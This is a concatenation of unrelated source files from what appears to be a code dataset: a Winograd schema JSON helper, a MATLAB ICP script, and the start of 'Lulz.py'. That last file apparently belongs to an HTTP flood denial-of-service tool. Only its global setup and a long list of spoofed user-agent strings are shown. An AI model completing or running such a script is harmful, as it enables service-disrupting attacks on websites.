grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0)
doppler_arrow_scale: float = 0.2
draw_doppler_arrows: bool = True
| 2.125 | 2 |
src/winograd_collection_manipulation/wsc_json_handler.py | gabimelo/portuguese_wsc | 6 | 12797462 | <filename>src/winograd_collection_manipulation/wsc_json_handler.py<gh_stars>1-10
import json
import pandas as pd
from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE
def generate_df_from_original_json():
with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp:
wsc_json = json.load(fp)
rows = []
for i in range(0, len(wsc_json), 2):
correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \
else wsc_json[i+1]['substitution'] # noqa E226
incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \
else wsc_json[i+1]['substitution'] # noqa E226
correct_sentence = correct_sentence.replace('recieved', 'received')
incorrect_sentence = incorrect_sentence.replace('recieved', 'received')
rows.append([correct_sentence, incorrect_sentence])
df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence'])
return df
def generate_df_from_json():
with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp:
wsc_json = json.load(fp)
rows = []
for i in range(len(wsc_json)):
rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'],
wsc_json[i]['manually_fixed_correct_sentence'],
wsc_json[i]['manually_fixed_incorrect_sentence'],
wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'],
wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'],
wsc_json[i]['translated']])
df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence',
'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence',
'correct_switched', 'incorrect_switched',
'is_switchable', 'is_associative', 'translated'])
return df
def generate_json(df):
json_rows = []
for index, row in df.iterrows():
dic = {'question_id': index,
'correct_sentence': row.correct_sentence,
'incorrect_sentence': row.incorrect_sentence,
'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence,
'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence,
'correct_switched': row.manually_fixed_correct_switched,
'incorrect_switched': row.manually_fixed_incorrect_switched}
dic['is_associative'] = False if 'is_associative' not in row else row.is_associative
dic['is_switchable'] = False if 'is_switchable' not in row else row.is_switchable
if dic['is_switchable'] and dic['correct_switched'] == '':
dic['correct_switched'] = row.correct_switched
dic['incorrect_switched'] = row.incorrect_switched
dic['translated'] = row.translated
json_rows.append(dic)
with open(WINOGRAD_SCHEMAS_FILE, 'w') as outfile:
json.dump(json_rows, outfile, ensure_ascii=False, indent=2)
| 2.71875 | 3 |
globmatinterpret.py | DonHaul/MultiCamCalAruco | 1 | 12797463 |
import sys, os
sys.path.append('./libs')
import numpy as np
import scipy.io
from libs import *
import matlab.engine
import numpy as np
import scipy.io
def CalculateGlobICP():
eng = matlab.engine.start_matlab()
#create a list of numpy arrays
#50
eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function
eng.cd("./GlobalProcrustesICP")
return RetrieveGlobICPOutput()
def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'):
mat = scipy.io.loadmat(outputpath)
print(mat['R'].shape)
#first dimension is number of cameras, second is number of steps
Hs = [[] for i in range(mat['R'].shape[0])]
for i in range(mat['R'].shape[0]):
#cuz last step returns no rotation
for k in range(mat['R'].shape[1]-1):
Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k])))
actualHs = [np.eye(4) for i in range(mat['R'].shape[0])]
print(len(actualHs),actualHs[0].shape)
for i in range(mat['R'].shape[0]):
for k in range(mat['R'].shape[1]-1):
actualHs[i] = np.dot(Hs[i][k] , actualHs[i])
print(actualHs[0].shape)
registeredModel = []
#registeredmodel[0][x][0] cointains the array of points of pointcloud x
for i in range(len(actualHs)):
registeredModel.append(print(mat['registeredModel'][0][i][0]))
#for i in range()
# Rt2Homo(R=None,t=None)
return actualHs,registeredModel | 2.1875 | 2 |
Lulz.py | kami4/Lulz.pl | 0 | 12797464 | <gh_stars>0
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
headers_useragents.append('agadine/1.x.x (+http://www.agada.de)')
headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)')
headers_useragents.append('AgentName/0.1 libwww-perl/5.48')
headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)')
headers_useragents.append('AideRSS/1.0 (aiderss.com)')
headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)')
headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)')
headers_useragents.append('Akregator/1.2.9; librss/remnants')
headers_useragents.append('Aladin/3.324')
headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2')
headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)')
headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)')
headers_useragents.append('AlkalineBOT/1.3')
headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)')
headers_useragents.append('Allesklar/0.1 libwww-perl/5.46')
headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)')
headers_useragents.append('Allrati/1.1 (+)')
headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>')
headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>')
headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>')
headers_useragents.append('AltaVista V2.0B <EMAIL>')
headers_useragents.append('amaya/x.xx libwww/x.x.x')
headers_useragents.append('AmfibiBOT')
headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)')
headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)')
headers_useragents.append('amibot')
headers_useragents.append('Amiga-AWeb/3.4.167SE')
headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)')
headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)')
headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3')
headers_useragents.append('amzn_assoc')
headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it')
headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js')
headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com')
headers_useragents.append('Anonymizer/1.1')
headers_useragents.append('AnswerBus (http://www.answerbus.com/)')
headers_useragents.append('AnswerChase PROve x.0')
headers_useragents.append('AnswerChase x.0')
headers_useragents.append('ANTFresco/x.xx')
headers_useragents.append('antibot-V1.1.5/i586-linux-2.2')
headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)')
headers_useragents.append('Apexoo Spider 1.x')
headers_useragents.append('Aplix HTTP/1.0.1')
headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)')
headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)')
headers_useragents.append('Aport')
headers_useragents.append('appie 1.1 (www.walhello.com)')
headers_useragents.append('agadine/1.x.x (+http://www.agada.de)')
headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)')
headers_useragents.append('AgentName/0.1 libwww-perl/5.48')
headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)')
headers_useragents.append('AideRSS/1.0 (aiderss.com)')
headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)')
headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)')
headers_useragents.append('Akregator/1.2.9; librss/remnants')
headers_useragents.append('Aladin/3.324')
headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2')
headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)')
headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)')
headers_useragents.append('AlkalineBOT/1.3')
headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)')
headers_useragents.append('Allesklar/0.1 libwww-perl/5.46')
headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)')
headers_useragents.append('Allrati/1.1 (+)')
headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>')
headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>')
headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>')
headers_useragents.append('AltaVista V2.0B <EMAIL>')
headers_useragents.append('amaya/x.xx libwww/x.x.x')
headers_useragents.append('AmfibiBOT')
headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)')
headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)')
headers_useragents.append('amibot')
headers_useragents.append('Amiga-AWeb/3.4.167SE')
headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)')
headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)')
headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3')
headers_useragents.append('amzn_assoc')
headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it')
headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js')
headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com')
headers_useragents.append('Anonymizer/1.1')
headers_useragents.append('AnswerBus (http://www.answerbus.com/)')
headers_useragents.append('AnswerChase PROve x.0')
headers_useragents.append('AnswerChase x.0')
headers_useragents.append('ANTFresco/x.xx')
headers_useragents.append('antibot-V1.1.5/i586-linux-2.2')
headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)')
headers_useragents.append('Apexoo Spider 1.x')
headers_useragents.append('Aplix HTTP/1.0.1')
headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)')
headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)')
headers_useragents.append('Aport')
headers_useragents.append('appie 1.1 (www.walhello.com)')
headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102')
headers_useragents.append('Apple-PubSub/65.1.1')
headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)')
headers_useragents.append('ArachBot')
headers_useragents.append('Arachnoidea (<EMAIL>)')
headers_useragents.append('aranhabot')
headers_useragents.append('ArchitextSpider')
headers_useragents.append('archive.org_bot')
headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)')
headers_useragents.append('Arikus_Spider')
headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)')
headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)')
headers_useragents.append('Asahina-Antenna/1.x')
headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)')
headers_useragents.append('ask.24x.info')
headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)')
headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)')
headers_useragents.append('ASPSeek/1.2.5')
headers_useragents.append('ASPseek/1.2.9d')
headers_useragents.append('ASPSeek/1.2.x')
headers_useragents.append('ASPSeek/1.2.xa')
headers_useragents.append('ASPseek/1.2.xx')
headers_useragents.append('ASPSeek/1.2.xxpre')
headers_useragents.append('ASSORT/0.10')
headers_useragents.append('asterias/2.0')
headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)')
headers_useragents.append('Atomic_Email_Hunter/4.0')
headers_useragents.append('Atomz/1.0')
headers_useragents.append('atSpider/1.0')
headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)')
headers_useragents.append('AU-MIC/2.0 MMP/2.0')
headers_useragents.append('AUDIOVOX-SMT5600')
headers_useragents.append('augurfind')
headers_useragents.append('augurnfind V-1.x')
headers_useragents.append('autoemailspider')
headers_useragents.append('autohttp')
headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)')
headers_useragents.append('AV Fetch 1.0')
headers_useragents.append('Avant Browser (http://www.avantbrowser.com)')
headers_useragents.append('AVSearch-1.0(<EMAIL>)')
headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites')
headers_useragents.append('AVSearch-3.0(AltaVista/AVC)')
headers_useragents.append('AWeb')
headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )')
headers_useragents.append('AxmoRobot - Crawling your site for better indexing on www.axmo.com search engine.')
headers_useragents.append('Azureus 2.x.x.x')
headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)')
headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)')
headers_useragents.append('BackStreet Browser 3.x')
headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)')
headers_useragents.append('BaiDuSpider')
headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)')
headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)')
headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)')
headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)')
headers_useragents.append('BanBots/1.2 (<EMAIL>)')
headers_useragents.append('Barca/2.0.xxxx')
headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)')
headers_useragents.append('(Privoxy/1.0)')
headers_useragents.append('*/Nutch-0.9-dev')
headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)')
headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de')
headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de')
headers_useragents.append('192.comAgent')
headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/')
headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64')
headers_useragents.append('4anything.com LinkChecker v2.0')
headers_useragents.append('8484 Boston Project v 1.0')
headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )')
headers_useragents.append('A-Online Search')
headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27')
headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24')
headers_useragents.append('AbachoBOT')
headers_useragents.append('AbachoBOT (Mozilla compatible)')
headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL')
headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)')
headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)')
headers_useragents.append('About/0.1libwww-perl/5.47')
headers_useragents.append('Accelatech RSSCrawler/0.4')
headers_useragents.append('accoona Accoona Search robot')
headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)')
headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)')
headers_useragents.append('Ace Explorer')
headers_useragents.append('Ack (http://www.ackerm.com/)')
headers_useragents.append('AcoiRobot')
headers_useragents.append('Acoon Robot v1.50.001')
headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)')
headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)')
headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)')
headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)')
headers_useragents.append('ActiveBookmark 1.x')
headers_useragents.append('Activeworlds')
headers_useragents.append('ActiveWorlds/3.xx (xxx)')
headers_useragents.append('Ad Muncher v4.xx.x')
headers_useragents.append('Ad Muncher v4x Build xxxxx')
headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)')
headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)')
headers_useragents.append('AESOP_com_SpiderMan')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)')
headers_useragents.append('(Privoxy/1.0)')
headers_useragents.append('*/Nutch-0.9-dev')
headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)')
headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41')
headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)')
headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0')
headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0')
headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)')
headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)')
headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)')
headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)')
headers_useragents.append('CSSCheck/1.2.2')
headers_useragents.append('Cynthia 1.0')
headers_useragents.append('HTMLParser/1.6')
headers_useragents.append('P3P Validator')
headers_useragents.append('W3C_Validator/1.654')
headers_useragents.append('W3C_Validator/1.606')
headers_useragents.append('W3C_Validator/1.591')
headers_useragents.append('W3C_Validator/1.575')
headers_useragents.append('W3C_Validator/1.555')
headers_useragents.append('W3C_Validator/1.432.2.5')
headers_useragents.append('W3C_Validator/1.432.2.22')
headers_useragents.append('W3C_Validator/1.432.2.19')
headers_useragents.append('W3C_Validator/1.432.2.10')
headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64')
headers_useragents.append('WDG_Validator/1.6.2')
headers_useragents.append('amaya/11.3.1 libwww/5.4.1')
headers_useragents.append('amaya/11.2 libwww/5.4.0')
headers_useragents.append('amaya/11.1 libwww/5.4.0')
headers_useragents.append('amaya/10.1 libwww/5.4.0')
headers_useragents.append('amaya/10 libwww/5.4.0')
headers_useragents.append('amaya/9.55 libwww/5.4.0')
headers_useragents.append('amaya/9.54 libwww/5.4.0')
headers_useragents.append('amaya/9.52 libwww/5.4.0')
headers_useragents.append('amaya/9.51 libwww/5.4.0')
headers_useragents.append('amaya/8.8.5 libwww/5.4.0')
headers_useragents.append('amaya/11.2 amaya/5.4.0')
headers_useragents.append('amaya/11.1 amaya/5.4.0')
headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)')
headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)')
headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)')
headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)')
headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)')
headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)')
headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)')
headers_useragents.append('iTunes/9.1.1')
headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')
headers_useragents.append('iTunes/9.0.3')
headers_useragents.append('iTunes/9.0.2 (Windows; N)')
headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)')
headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)')
headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)')
headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;')
headers_useragents.append('ProxiNet; Danger hiptop 1.0)')
headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)')
headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)')
headers_useragents.append('DoCoMo/1.0/N503is/c10')
headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)')
headers_useragents.append('MMP/2.0')
headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4')
headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1')
headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0')
headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0')
headers_useragents.append('PDXGW/1.0')
headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel')
headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)')
headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16')
headers_useragents.append('Version/4.0 Mobile Safari/533.1')
headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;')
headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;')
headers_useragents.append('Windows CE; PPC; 240x320)')
headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;')
headers_useragents.append('Windows CE; PPC; 240x320)')
